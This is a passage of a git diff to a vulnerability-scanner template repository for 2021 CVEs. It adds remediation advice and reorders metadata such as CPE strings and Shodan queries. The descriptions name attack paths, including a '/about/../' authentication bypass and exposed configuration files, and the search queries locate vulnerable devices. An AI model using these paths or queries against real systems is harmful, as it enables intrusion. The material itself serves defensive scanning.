@@ -16,14 +18,14 @@ info: cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.0021 - cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* epss-percentile: 0.5823 + cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: underconstruction_project product: underconstruction + framework: wordpress tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated http: diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 8e106e9926..08cf4662d7 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + remediation: | + Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-39322 cwe-id: CWE-79 epss-score: 0.00234 - cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* epss-percentile: 0.60774 + cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: cybernetikz product: easy_social_icons + framework: wordpress tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan http: diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index e56ee445d4..4fdbb40d7d 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + remediation: | + Update to the latest version of WordPress BulletProof Security. reference: - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-39327 cwe-id: CWE-459,CWE-200 epss-score: 0.08547 - cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* epss-percentile: 0.93622 + cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: ait-pro product: bulletproof_security + framework: wordpress tags: exposure,packetstorm,cve,cve2021,wordpress http: diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index d26f11ac5a..99b8732598 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + remediation: | + Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00104 - cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* epss-percentile: 0.41813 + cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: foliovision product: fv_flowplayer_video_player + framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated http: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 94762bd6c8..ec783ac4b6 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -5,6 +5,8 @@ info: author: Veshraj severity: high description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + remediation: | + Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability. reference: - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433 @@ -14,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39433 epss-score: 0.00902 - cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* epss-percentile: 0.80714 + cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: biqs diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 3b19fd1634..1dd9ada392 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + remediation: | + Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability. reference: - https://github.com/eyoucms/eyoucms/issues/17 - https://github.com/KietNA-HPT/CVE @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-39501 cwe-id: CWE-601 epss-score: 0.00093 - cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* epss-percentile: 0.38821 + cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eyoucms diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 31c3780e16..f13c725cf6 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. + remediation: | + Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability. reference: - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-40149 cwe-id: CWE-552 epss-score: 0.00689 - cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.77586 + cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Reolink" verified: true + max-request: 1 vendor: reolink product: e1_zoom_firmware + shodan-query: http.title:"Reolink" tags: exposure,unauth,packetstorm,cve,cve2021,reolink,camera,iot http: diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 321bb4d8ce..2d0ab21104 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI. + remediation: | + Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150). reference: - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-40150 cwe-id: CWE-552 epss-score: 0.00892 - cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.80593 + cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Reolink" verified: true + max-request: 1 vendor: reolink product: e1_zoom_firmware + shodan-query: http.title:"Reolink" tags: cve,cve2021,reolink,camera,exposure,iot http: diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 91c7127890..44b20975e1 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: critical description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. + remediation: | + Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 - https://github.com/cobbler/cobbler/issues/2795 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-40323 cwe-id: CWE-94 epss-score: 0.01788 - cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* epss-percentile: 0.86537 + cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cobbler_project diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index 61d2cb3070..21a4437fce 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -5,21 +5,21 @@ info: author: pdteam severity: critical description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. + remediation: Upgrade to Apache version 2.4.49 or later. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - https://cert-portal.siemens.com/productcert/pdf/ssa-685781.pdf - https://lists.apache.org/thread.html/r210807d0bb55f4aa6fbe1512be6bcc4dacd64e84940429fba329967a@%3Cusers.httpd.apache.org%3E - remediation: Upgrade to Apache version 2.4.49 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 epss-score: 0.97523 - cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* epss-percentile: 0.99978 + cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 3c0059a518..6fbe1c1a46 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -5,21 +5,21 @@ info: author: daffainfo,pdteam severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. + remediation: Upgrade to ADSelfService Plus build 6114. reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - https://github.com/synacktiv/CVE-2021-40539 - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 - https://www.manageengine.com - remediation: Upgrade to ADSelfService Plus build 6114. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-706 epss-score: 0.97487 - cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* epss-percentile: 0.99953 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 vendor: zohocorp diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 9122f13afb..93f761111e 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://github.com/OS4ED/openSIS-Classic/issues/189 - https://nvd.nist.gov/vuln/detail/CVE-2021-40542 @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.00643 - cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* epss-percentile: 0.76616 + cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"openSIS" vendor: os4ed product: opensis + shodan-query: http.title:"openSIS" tags: xss,cve,cve2021,opensis http: diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index d7e68e0669..c68c71da11 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks. reference: - https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661 @@ -17,15 +19,15 @@ info: cve-id: CVE-2021-40661 cwe-id: CWE-22 epss-score: 0.01112 - cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* epss-percentile: 0.82732 + cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: inurl:excalweb.dll - shodan-query: IND780 verified: true + max-request: 1 vendor: mt product: ind780_firmware + shodan-query: IND780 + google-query: inurl:excalweb.dll tags: cve,cve2021,ind780,lfi http: diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index bfeef8d1e6..fb20d7197e 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -5,6 +5,8 @@ info: author: For3stCo1d,aringo-bf severity: high description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host. + remediation: | + Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability. reference: - https://gccybermonks.com/posts/cve-2021-40822/ - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3 @@ -17,11 +19,11 @@ info: cve-id: CVE-2021-40822 cwe-id: CWE-918 epss-score: 0.6683 - cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* epss-percentile: 0.97493 + cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: osgeo product: geoserver shodan-query: title:"GeoServer" diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 1c1b48fe58..e2d78fb159 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data. + remediation: | + Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-40856 - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-40856 cwe-id: CWE-706 epss-score: 0.02537 - cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.88804 + cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: auerswald diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 48ea3aae68..d93ce1b38c 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -5,6 +5,8 @@ info: author: pussycat0x severity: critical description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password. + remediation: | + Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability. reference: - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40859 @@ -15,13 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40859 epss-score: 0.02655 - cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* epss-percentile: 0.89037 + cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: '"auerswald"' vendor: auerswald product: compact_5500r_firmware + fofa-query: '"auerswald"' tags: cve,cve2021,iot,unauth,voip,auerswald http: diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 85df285e26..42ecdec156 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. + remediation: Upgrade to Cloudron 6.3 or higher. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html - https://www.cloudron.io/ - remediation: Upgrade to Cloudron 6.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 epss-score: 0.00264 - cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* epss-percentile: 0.63286 + cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cloudron diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index fa70f7ac7d..2d22faadcc 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + remediation: | + Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability. reference: - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-40870 cwe-id: CWE-23 epss-score: 0.95606 - cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* epss-percentile: 0.99146 + cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: aviatrix diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 1a048fa349..bb753f3e66 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -5,6 +5,8 @@ info: author: oscarintherocks severity: high description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + remediation: | + Securely restrict access to the files.md5 file and ensure that it is not accessible to unauthorized users. reference: - htttps://github.com/SakuraSamuraii/derailed - https://johnjhacking.com/blog/cve-2021-40875/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2021-40875 cwe-id: CWE-425 epss-score: 0.04429 - cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* epss-percentile: 0.91335 + cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.html:"TestRail" vendor: gurock product: testrail + shodan-query: http.html:"TestRail" tags: cve,cve2021,exposure,gurock,testrail http: diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 8303d21d4b..ecfd51a15d 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection vulnerability in Login.php in Sourcecodester Purchase Order Management System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username parameter. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09 - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2021-40908 cwe-id: CWE-89 epss-score: 0.01192 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.83381 + cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system tags: cve,cve2021,sqli,purchase-order,poms diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index d1f89aae09..41afc07e10 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 @@ -15,8 +17,8 @@ info: cve-id: CVE-2021-40960 cwe-id: CWE-22 epss-score: 0.01168 - cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* epss-percentile: 0.83172 + cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: galera diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index c518342ed8..41683eb901 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40968 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 1cdda3884e..3628085e9a 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the firstname parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40969 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 82d824c580..77dd29a3b9 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40970 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 895c242f1d..63bd9b481b 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter. + remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ - https://github.com/spotweb/spotweb/issues/711 - https://nvd.nist.gov/vuln/detail/CVE-2021-40971 - https://github.com/spotweb/spotweb - remediation: Fixed in version 1.5.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00158 - cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* epss-percentile: 0.51596 + cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" - shodan-query: title:"SpotWeb - overview" + max-request: 1 vendor: spotweb_project product: spotweb + shodan-query: title:"SpotWeb - overview" tags: cve,cve2021,xss,spotweb http: diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index fc341602f5..6a2086118c 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter. + remediation: Fixed in version 1.5.2 reference: - 